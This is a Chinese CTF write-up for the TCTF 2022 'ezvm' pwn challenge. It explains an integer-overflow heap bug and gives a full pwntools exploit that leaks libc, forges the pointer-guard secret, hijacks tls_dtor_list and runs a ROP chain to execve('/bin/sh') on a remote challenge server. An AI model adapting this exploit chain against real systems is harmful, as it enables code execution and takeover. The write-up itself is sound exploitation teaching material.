tctf2022ezvm - pwn | dreamcat = 我他喵的

# 思路

在申请 memery 的时候存在整数溢出，程序虽然会检测到，但是允许我们进行一次的整数溢出申请，这样实际的 memery 的 count 很大，但是 chunk 的大小远小于这个值，造成了堆块的越界读写。
当我们申请一个很大的堆块，会在 libc 附近分配，配合越界写，我们就可以修改 tls_dtor_list, 以及 secret 的值。
chunk 的释放冲 i 性能申请没有对其进行清空，所以，我们申请出一个 largebin 范围的 chunk，然后释放，这样再次将其申请出来的时候，在 memery [1] 会存有一个指针，就可以知道 libc 的及地址了。将这个数据存在这个 chunk+0x1d0 附近，在这里写一些数据，拼接出 mov_r_i 的指令，以及一个 jmp 到低地址的指令释放。然后我们我们这次的时候，codesize 为 0x200, 就会将刚写进去的拼接指令，放到 code 的靠后的位置，我们只需要在 code 的最开始写一个 jmp，让 vm 跳到我们刚写的拼接指令哪里，将 libc 的放入寄存器。同时这一次的 memerycount 要发生溢出，并且在 libc 附近申请到一个 chunk. 这样根据偏移量，结合程序的一些基本运算，就得到了函数地址，gadget 地址。然后修改 tls_dtor_list 到 heap 上，并在哪里填充 rop, 以及修改 searet 的值。最后触发程序错误，直接 exit，getshell

# exp

from pwn import *
#r=process('./ezvm')
r=remote('202.120.7.210',40241)


code =b'\x00'*0

def push(rig):
	global code
	code +=p8(0)+p8(rig)

def pop(rig):
	global code
	code +=p8(1)+p8(rig)

def add():
	global code
	code+=p8(2)

def sub():
	global code
	code +=p8(3)

def imul():
	global code
	code +=p8(4)

def div():
	global code
	code+=p8(5)

def yu():
	global code
	code +=p8(6)

def left():
	global code
	code+=p8(7)

def right():
	global code
	code +=p8(8)

def And():
	global code
	code +=p8(9)

def Or():
	global code
	code +=p8(11)

def xor():
	global code
	code +=p8(12)

def judge0():
	global code
	code +=p8(13)

def jmp(address):
	global code
	code +=p8(14)+p64(address)

def jnz(address):
	global code
	code +=p8(15)+p64(address)

def jz(address):
	global code
	code +=p8(16)+p64(address)

def cmpequ():
	global code
	code+=p8(17)

def cmpsml():
	global code
	code+=p8(18)
def cmpbig():
	global code
	code +=p8(19)

def mov_r_i(rig,num):
	global code
	code+=p8(20)+p8(rig)+p64(num)

def mov_m_r(rig,offset):
	global code
	code +=p8(21)+p8(rig)+p64(offset)
def mov_r_m(rig,offset):
	global code
	code +=p8(22)+p8(rig)+p64(offset)

def clear():
	global code
	code = b'\x00'*0
#size(stack) = 0x800 ====>we can use it to save 0x100 nums

def runcode(code,code_size,mem_size):
	
	r.sendlineafter("Please input your code size:",str(code_size))
	r.sendlineafter("Please input your memory count:",str(int(mem_size/8)))
	r.sendlineafter("Please input your code:",code)

mov_r_i(0,0x111111)
mov_r_i(1,0x222222)
mov_r_i(2,0x333333)
mov_r_i(3,0x444444)

push(0)
push(1)
push(2)
push(3)
#context.log_level = 'debug'
print(len(code))
r.sendlineafter("Welcome to 0ctf2022!!",'aaa')

runcode(code,0xf0,0x600)
#gdb.attach(r,'brva 0x000001582')

clear()


#leak the libc

mov_r_m(0,0)
mov_r_m(0,0)
mov_r_i(1,0x219ce0)
mov_r_i(1,0x219ce0)

push(2)
push(3)
push(0)
push(1)
sub()
pop(0)#put libc into heap

mov_r_i(1,0x14000000000000)
mov_m_r(1,0x3a-0xa)
mov_m_r(0,0x3b-0xa)
mov_r_i(1,0xfffffffffffe700e)#jmp
mov_m_r(1,0x3c-0xa)
mov_r_i(2,0xffff)#addr
mov_m_r(2,0x3d-0xa)

print(len(code))
r.sendlineafter("continue",'')
runcode(code,0xf0,0x600)
clear()

#we have the libc in mem
tls_offset = 0x0028c0  #libc - 
tls_dtor_list_offset = 0x0416d8#libc-
secret_offset = 0x0028c0-0x30
heap_offset = 0x43ff0
sec_heap_offset = 0x0082ec
tls_dtor_list_heap_offset = 0x0082bb
#gdb.attach(r)
#code3 we need to malloc  a big one

jmp(0x000186-9)

push(0)
mov_m_r(0,0)	#memery[0]  ==libc
# mov_r_i(1,secret_offset)
# push(1)
# sub()
# pop(2)
# mov_m_r(2,1)	#memery[1] = secret_address
sec = 0x5143329d0ccc697
mov_r_i(1,sec)
mov_m_r(1,sec_heap_offset)	#secret = 0xcafebabedeadbeef



pos_offset = int(0x100/8)
#read rop to che chunk 
'''rop
leave_ret = libc + 0x000562ec
prdi = libc + 0x002a3e5
prsi = libc + 0x02be51
prdx_pr12 = libc +0x011f497
binsh = libc + 0x001d8698
execve = libc + 0xeb0f0

addr = ((leave_ret^sec)<<0x11)&0xffffffffffff8000
addr += ((leave_ret^sec)>>0x2f)&0x7fff


rop = p64(prdi) + p64(binsh)
rop += p64(prsi) + p64(0)
rop += p64(prdx_pr12) + p64(0)*2
rop += p64(execve)

'''
leave_ret =  0x000562ec
prdi =  0x002a3e5
prsi =  0x02be51
prdx_pr12 = 0x011f497
binsh = 0x001d8698
execve =  0xeb0f0



#write leave ret
push(0)
mov_r_i(1,leave_ret)
push(1)
add()
mov_r_i(1,sec)
push(1)
xor()
pop(2)
push(2)		#2 xor save
push(2)

mov_r_i(1,0x11)
push(1)
left()
mov_r_i(1,0xffffffffffff8000)
push(1)
And()
pop(2)		#addr lef
pop(3)		

push(3)		#xor res
mov_r_i(1,0x2f)
push(1)
right()
mov_r_i(1,0x7fff)
push(1)
And()
push(2)
add()
pop(2)				#leave_ret_encrept

mov_m_r(2,pos_offset)
pos_offset+=1

#pop _rdi
push(0)
mov_r_i(1,prdi)
push(1)
add()
pop(2)
mov_m_r(2,pos_offset)
pos_offset+=1

#binsh
push(0)
mov_r_i(1,binsh)
push(1)
add()
pop(2)
mov_m_r(2,pos_offset)
pos_offset+=1

#pop rsi
push(0)
mov_r_i(1,prsi)
push(1)
add()
pop(2)
mov_m_r(2,pos_offset)
pos_offset+=1

#0
pos_offset+=1

#prdx 0 0
push(0)
mov_r_i(1,prdx_pr12)
push(1)
add()
pop(2)
mov_m_r(2,pos_offset)
pos_offset+=3

#execve
push(0)
mov_r_i(1,execve)
push(1)
add()
pop(2)
mov_m_r(2,pos_offset)


#change the tls_dtor_list
push(0)
mov_r_i(1,heap_offset-0x100)
push(1)
sub()
pop(2)
mov_m_r(2,tls_dtor_list_heap_offset+0x20)	#list = heap_address


push(4)

#gdb.attach(r,'b exit')
context.log_level = 'debug'
print(hex(len(code)))
r.sendlineafter("continue",'')
r.sendlineafter("Please input your code size:",str(0x1f0))
r.sendlineafter("Please input your memory count:",str(0x6000000000008000))
r.sendlineafter("Please input your code:",code)
r.interactive()

writeup

# 思路

# exp

glibc-2.35一些手法